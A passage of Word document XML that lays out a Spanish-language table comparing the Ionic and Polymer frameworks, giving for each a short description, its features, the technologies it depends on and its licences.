          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>MONGO DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1772" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>MIT</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>GPL</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>FREE BSD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidTr="00DE74BD">
        <w:trPr>
          <w:trHeight w:val="323"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4957" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Ionic</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63D96543" wp14:editId="260E9BB3">
                  <wp:extent cx="3181350" cy="1072115"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="57" name="Imagen 57" descr="Resultado de imagen para ionic framework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ionic framework logo"/>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187411" cy="1074157"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4488" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:ind w:firstLine="709"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Ionic 2 es un framework para el desarrollo de aplicaciones híbridas, inicialmente pensado para móviles y tablets, aunque ahora también capaz de implementar aplicaciones web e incluso dentro de pocas aplicaciones de escritorio multiplataforma.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3873" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Utilidad multiplataforma</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Interfaz de usuario amigable</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Framework libre y código abierto</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Desarrollo posible y fácil de aplicaciones de cross mobile</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2497" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>NODE JS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>CORDOVA</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>ANGULAR JS.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>NPM</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>SASS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1772" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>MIT</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>GPL</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>OPEN SOURCE</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidTr="00DE74BD">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4957" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Polymer</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1977EC22" wp14:editId="28AAA07B">
                  <wp:extent cx="2047875" cy="1424609"/>
                  <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                  <wp:docPr id="58" name="Imagen 58" descr="Resultado de imagen para polymer framework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polymer framework logo"/>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50023" cy="1426103"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4488" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:ind w:firstLine="709"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:ind w:firstLine="709"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Polymer es una biblioteca liviana que lo ayuda a aprovechar al máximo los componentes web.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:ind w:firstLine="709"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Con Web Components, puede crear elementos personalizados reutilizables que interactúen sin problemas con los elementos integrados del navegador, o divida su aplicación en componentes de tamaño adecuado, haciendo que su código sea más limpio y menos costoso de mantener.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3873" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Polymer App Toolbox</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
